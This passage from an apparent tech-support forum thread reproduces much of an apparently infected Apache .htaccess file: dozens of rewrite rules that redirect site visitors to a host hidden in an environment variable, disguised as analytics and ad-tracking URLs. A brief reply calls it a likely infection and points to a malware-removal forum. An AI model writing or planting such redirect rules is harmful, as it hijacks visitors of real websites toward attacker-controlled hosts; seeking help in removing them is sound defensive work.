RewriteRule ^.* http://%{ENV:mBZ}/b/ss/jobsdb-prd-id/1/H.23.6/s78095071635067?AQB=1&ndh=1&t=26/5/2012\%2010:44:46\%202\%20-420&ce=UTF-8&ns=jobsdb&pageName=search/jobadsingledetail&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=id.jobsdb.com&events=event4\%2Cevent1&c1=ID&v1=ID&c2=search&v2=search&c4=logged\%20out:search/jobadsingledetail&v4=logged\%20out&c5=/id/id/search.mvc/jobadsingledetail&v5=/id/id/search.mvc/jobadsingledetail&c6=D\%3Dg&v6=D\%3Dg&c10=D\%3Ds_vi&v10=D\%3Ds_vi&v25=200003000417070&v30=Editorial\%20/\%20Journalism(80)&h1=search/jobadsingledetail&s=1024x768&c=32&j=1.7&v=N&k=Y&bw=674&bh=308&p=Mozilla\%20Default\%20Plug-in\%3B2007\%20Microsoft\%20Office\%20system\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11961:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 29
RewriteRule ^.* http://%{ENV:mBZ}/lg.php?bannerid=189&campaignid=62&zoneid=52&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=0296e80428  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11962:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 30
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=O9z7T5ykCcqIrAe3qsDjBg&q=hip+hop+dancer+vector&tbs=isz:l&page=1&tbnh=137&tbnw=193&start=0&ndsp=18&dur=986&tbnid=kFGvtGGSSEUXMM:&hovh=189&hovw=267&vpx=183&vpy=78&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:0,s:0,i:73&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10185:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 31
RewriteRule ^.* http://%{ENV:mBZ}/statapi/stat/add?jsoncallback=jsonp1341195919976&app_id=4fd761140c62703013000228&article_id=842620&title=Liputan\%2520Khusus\%2520Piala\%2520Eropa\%25202012\%2520-Prandelli\%253A\%2520Meski\%2520Kalah\%252C\%2520Italia\%2520Membanggakan&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ip=10.50.12.118&browser=Mozilla&version=5.0+(Windows)&platform=Windows+NT+5.1&user_agent=Mozilla/5.0+(Windows+NT+5.1\%3B+rv:8.0.1)+Gecko/20100101+Firefox/8.0.1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9115:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 32
RewriteRule ^.* http://%{ENV:mBZ}/fpc.pl?v=5.1.0.13.js&a=10001377311235&dpid=884078716&fpc=egOBDXwN\%7CW7O5tAhMaa\%7Cfses10001377311235\%3D\%7CSCaWN80Laa\%7CegOBDXwN\%7Cfvis10001377311235\%3DZT1odHRwJTNBJTJGJTJGdXMubWc0Lm1haWwueWFob28uY29tJTJGbmVvJTJGbGF1bmNoJTNGLnJhbmQlM0Ricmpmczlnb2lqOG5vJmY9aHR0cCUzQSUyRiUyRmlkLnlhaG9vLmNvbSUyRiUzRnAlM0R1cyZiPVlhaG9vISUyMEluZG9uZXNpYQ\%3D\%3D\%7C8MTsTMYHY0\%7C8MTsTMYHY0\%7C8MTsTMYHY0\%7Cs\%7C8MTsTMYHY0\%7C8MTsTMYHY0&ittidx=0&flv=Shockwave\%20Flash\%2011.1\%20r102&n=-7&g=en-US&h=N&j=1280x720&k=24&l=true&f=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=Yahoo!\%20Indonesia&enc=UTF-8&e=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&d=Mon\%2C\%2016\%20Jul\%202012\%2009:44:42\%20GMT  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10420:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 33
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.3&utms=2&utmn=1526049055&utmhn=jakartacity.olx.co.id&utme=8(2!entryPage)9(2!services/item/oldItem/207)11(2!1)&utmcs=UTF-8&utmsr=800x600&utmvp=783x440&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=PELATIHAN\%205S\%20/\%205R\%20-\%20Jakarta\%20-\%20Jasa\%20Lain&utmhid=1618081241&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=services/item/oldItem/207&utmac=UA-2530746-1&utmcc=__utma\%3D209359949.41587538.1340963965.1340963965.1340963965.1\%3B\%2B__utmz\%3D209359949.1340963965.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dpelatihan\%25205s\%2520jakarta\%3B&utmu=uzGgAAAAIAAAAAAAAAAAAAB~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9372:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 34
RewriteRule ^.* http://%{ENV:mBZ}/_xhr/ugccomments/?method=get_context_uuid&context_id=28729240&0.5455820464596506&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&context_category=video  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10985:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 35
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-11874&sessionID=1342079833405.48704&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/chou_yo_hana_yo/v04/c017/8.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.yRpGWk2N&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/chou_yo_hana_yo/v04/c017/7.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Chou\%20yo\%20Hana\%20yo\%2017\%20-\%20Read\%20Chou\%20yo\%20Hana\%20yo\%20Chapter\%2017\%20Online\%20-\%20Page\%208&ts1342079833407.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9117:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 36
RewriteRule ^.* http://%{ENV:mBZ}/ja/a/hb/i/sg/adv/infinity/infinity_local_backfill_reordered_favicon.html?rnd=119313&ysm_rd=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_cm=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_ss=&ysm_ss_tag=&ysm_hs=&ysm_max_ads=6&ysm_ads_per_page=3&ysm_scroll_delay=10000&ysm_landing_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_width=300&ysm_height=250&ysm_css=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_backup_gif=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_mkt=id  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11071:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 37
RewriteRule ^.* http://%{ENV:mBZ}/publisherEvent?eventtype=impression&pid=467&chid=753&wid=3439&type=icatcher&query=section\%208&preselections=0db5bd50397eaa57750d6f3014b37984f06fe2d4,957fd3a8bde15302e80d44d0894f2ef07a4007d2,03a6696176e24ee12ffe35ce4772163098f23c0c,5716f4e73fc36eb0302bd7aa45e266eb9a565f64,0d458f03f4ca434b9ad325b25882b5c7435f34a0,8303f200908ac1a9d6bb5d9b566b2e256a052fa9&location=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pcid=C42D1289-1880-0001-8297-1E30178F14C7&sid=C42D1289-1980-0001-B59C-15901A449960&xpos=-1&ypos=-1&adId=733&biddingId=7099&bp=10&random=1264498545349&target=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11275:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 38
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_inbox&tID=2&d=0&f=978532093&l=SKY\%2CREC\%2CMNW&rn=1341567813763&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9654:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 39
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=35927&campaignid=4402&zoneid=1970&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=367883a46c  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9666:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 40
RewriteRule ^.* http://%{ENV:mBZ}/router/?ishd=0&w=trafficList&ign=0&wn=1&cen=1&nv=1&inu=1&pvid=1342234061495-024900513923076795&pvnum=1&tats=2&fl=0&vid=new&rn=0&lg=1&u=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&t=e-Journal\%20Unesa&sw=1024&sh=768&pid=0&wid=679ae0f4d0e30665&proid=0&fhst=&tft=3&wh=Live+Traffic+Feed&hl=0&hlnks=0&srefs=0&hbars=0&hfce=0&wne=10&msum=5289712a&gid=0&flt=724&fv=0&tfen=1&flc=&lu=0&isIE=0&oldB=0&mgen=Open\%20Journal\%20Systems\%202.3.6.0&fjv=2&rand=477800989&ww=200  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9855:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 41
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36709&campaignid=7505&zoneid=1656&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=8c0d2df6ce  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10626:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 42
RewriteRule ^.* http://%{ENV:mBZ}/webpagethumbnail?r=4&f=3&s=400:585&query=keruntuhan+komunis+di+cina&hl=id&gl=id&c=29&d=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=1&j=google.nyc.c.j_pkTpT7_LLIS0rAfPo7ySDg_1844790126_2&a=yiN  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9332:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 43
RewriteRule ^.* http://%{ENV:mBZ}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/tsuki_to_himawari/v01/c000/18.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10712:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 44
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=UhTkT-LNFofprAfjxLn3CA&q=batu+badar+asem&tbs=&page=4&tbnh=163&tbnw=217&start=56&ndsp=20&dur=167&tbnid=nrZqw0nknn4i7M:&hovh=183&hovw=275&vpx=441&vpy=225&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:12,s:56,i:290&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9051:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 45
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=6&utmn=1116491465&utmhn=www.yuktravel.com&utmcs=ISO-8859-1&utmsr=1024x600&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Booking\%20Hotel\%20di\%20Indonesia\%20-\%20Promo\%20Voucher\%20Hotel\%20Indonesia&utmhid=1345609067&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel-domestik/&utmac=UA-24781983-3&utmcc=__utma\%3D156601188.229284525.1340326523.1340758277.1340760543.5\%3B\%2B__utmz\%3D156601188.1340760543.5.5.utmcsr\%3Dweddingku.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/collections/1/1/JKT/gaun-pengantin\%3B&utmu=qB~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11628:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 46
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_inbox&tID=3&d=0&f=978500093&l=SKY\%2CREC\%2CMNW&rn=1341276729442&en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9233:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 47
RewriteRule ^.* http://%{ENV:mBZ}/stats.js?cleartogo=1&cc=&refpp=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&site=5013&icon=1&sw=1366&hw=768&color=32&f=1&uiqGTOP=&cc=&hascookie=1&1XcAdGTOP=&j=1&c=1&lang=es&timezone=23&referer=4gifs.com&word=/gallery/main.php\%3Fg2_page\%3D3&browser=5&os=10&swords=0&-&fromd=4gifs.com&fromp=/gallery/v/Soccer_dive_mouth.gif.html&0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9751:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 48
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=8&c2=6299460&c3=1000000000000000002&ns__t=1340928564196&ns_c=ISO-8859-1&c8=KapanLagi.com:\%20Foto\%20No:\%204\%20-\%20Honda\%20Odyssey\%202002\%20Rp.\%20137.500.000\%20IN-1696774\%20Otosia.com&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10160:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 49
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-14847&sessionID=1342439779185.12388&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/fly_high/v01/c002/34.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.IqiZaZ3h&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/fly_high/v01/c002/33.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Fly\%20High!\%202\%20-\%20Read\%20Fly\%20High!\%20Chapter\%202\%20Online\%20-\%20Page\%2034&ts1342439779187.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11871:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 50
RewriteRule ^.* http://%{ENV:mBZ}/b/ss/jobsdb-prd-id/1/H.23.6/s35250521085753?AQB=1&ndh=1&t=3/6/2012\%2010:16:5\%202\%20-420&ce=UTF-8&ns=jobsdb&pageName=search/jobadsingledetail&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=id.jobsdb.com&events=event4\%2Cevent1&c1=EN&v1=EN&c2=search&v2=search&c4=logged\%20out:search/jobadsingledetail&v4=logged\%20out&c5=/id/en/search.mvc/jobadsingledetail&v5=/id/en/search.mvc/jobadsingledetail&c6=D\%3Dg&v6=D\%3Dg&c10=D\%3Ds_vi&v10=D\%3Ds_vi&v25=200003000423301&v30=Clerical\%20/\%20Admin\%20Staff\%20/\%20General\%20Affair(17)\%2CElectrical\%20/\%20Electronics(95)\%2CApplication\%20Specialist\%20-\%20Software\%20/\%20Programming(132)&h1=search/jobadsingledetail&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=674&bh=398&p=Shockwave\%20Flash\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11616:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 51
RewriteRule ^.* http://%{ENV:mBZ}/pixel;r=1146139776;a=p-dd9FcP3j0Ujek;fpan=0;fpa=P0-448768694-1340327916931;ns=0;ce=1;je=0;sr=1024x768x24;enc=n;dst=0;et=1340328404189;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9043:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 52
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341910805967&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Bosan\%20dengan\%20Angry\%20Birds\%3F\%20Sebentar\%20lagi\%20akan\%20ada\%20Angry\%20Pigs!\%20\%20&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=merdekadotcom&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1341904553633267583398819  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11433:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 53
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=JH_-T9bUG4LLrQf6_YnCBg&q=laundry+logo&tbs=&page=14&tbnh=119&tbnw=212&start=265&ndsp=20&dur=545&tbnid=MkBv1i5WWOQqJM:&hovh=168&hovw=300&vpx=531&vpy=243&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:7,s:265,i:298&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11279:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 54
RewriteRule ^.* http://%{ENV:mBZ}/iu3?d=assoc-amazon.com&rP=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cB=3825227112148294  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11920:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 55
RewriteRule ^.* http://%{ENV:mBZ}/st?ad_type=pop&ad_size=0x0&section=3132152&banned_pop_types=23&pop_times=100&pop_frequency=0&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11011:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 56
RewriteRule ^.* http://%{ENV:mBZ}/adj/N3568.139749.9958923604621/B4230567.2;sz=728x90;click=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9722:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 57
RewriteRule ^.* http://%{ENV:mBZ}/p?pub=s438b7lqmkmdk5pkfek4&random=1342162921574&pu=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pq=k\%3DfaSMTM0MjE2MjgyMTA3Nzk0NjM4NjU\%253DfbSMWM5fcSMTM4N2YyMzVmZDU\%253DfdSMTM4N2YyM2M5MWQ\%253DfeSfgSYzQ\%253DfhSMTdkfiSOTk\%253DfjSfkSMTU5flSfmSNzA\%253DfnSNzA\%253DfoSfpSMTdkfqSMjA\%253DfrSMw\%253D\%253DfsSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWwvdjM0L2MyODkvM\%25245odG1sftSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWwvdjM0L2MyODgvMjUuaHRtbA\%253D\%253DfuSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWw\%253DfvSOGY\%253DfwSYzQ\%253DfxSNWE1fySOTk\%253DfzSNTgx&t=view&pt=This\%20Transformation\%20Shocked\%20A\%20Whole\%20Network\%20-\%20MGID&vGUID=9b69fc5b-bc82-72f3-50ba-167604db1e77  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9549:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 58
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-8365&sessionID=1341484779951.40591&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/metallic_colors/c001/39.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.shFV0Inm&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/metallic_colors/c001/38.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Metallic\%20Colors\%201\%20-\%20Read\%20Metallic\%20Colors\%20Chapter\%201\%20Online\%20-\%20Page\%2039&ts1341484779953.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10627:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 59
RewriteRule ^.* http://%{ENV:mBZ}/s?nsivbblmin=12834.000&vq=auto&nsivbblmax=39266.000&ad_event=3&vid=_9alL9wKgMaud9fHDA1p2698EClXVF8dC&lact=3694&et=0.267&st=0.267&rendering=software&vh=360&decoding=accelerated&at=2_3&vw=640&nsiabblmin=510.000&feature=relmfu&tsphab=1&hbd=4255793&tspne=0&ns=yt&hbt=211.031&tspfdt=1547&plid=AATEeERFtmk17CxV&cr=ID&fv=WIN\%2010\%2C2\%2C152\%2C32&playback=1&el=detailpage&hl=en_US&ad_flags=0&w=640&nsiabblc=17&sd=B6F5EF806HH1341920728903797&nsivbblmean=22849.706&fmt=34&nsiabblmax=1815.000&bc=474423&docid=nQKr2xOER3M&cid=12045&allowed=1_1,1_3,2_1,2_3&art=1.546&md=1&len=36&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&bd=347562&bt=2.001&hasstoryboard=1&csipt=watch5ad&sdetail=f:relmfu\%2Crv:AijEQN6AuRs&volume=100&tpmt=0&cfps=0&screenw=1360&screenh=768&sst=0&fexp=920704,912706,921602,924700,914501,913542,907335,922600,919306,907341,907344,907217,920706,919316,902518,919324,924500,906717,910207&sendtmp=1&mt=0&h=360&slots=sst~0;sidx~0;at~2_3&scoville=1&playerw=640&playerh=390&mos=0&sidx=0&fs=0&sourceid=yw&nsiabblmean=841.471&nsivbblc=17&ptk=TheStation\%2Buser&rt=3.826  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11464:/:0:HttpOnly]
 
</IfModule>
#1a55cca5fd9632973e9f2845921448fcdad6d8d0cb74721e03d5e983
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 

 



BC AdBot (Login to Remove)

 


#2 JohnC_21

JohnC_21

  • Members
  • 23,609 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:50 PM

Posted 25 March 2018 - 03:42 PM

If the file regenerates then it could very well be an infection. You are in the wrong forum. Start a thread in the Virus Removal Forum. Make sure you read the pinned posts and be sure to include the FRST log into you post or you will be kicked out to the Am I Infected Forum. A Malware Removal Expert will examine the FRST log and provide assistance.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users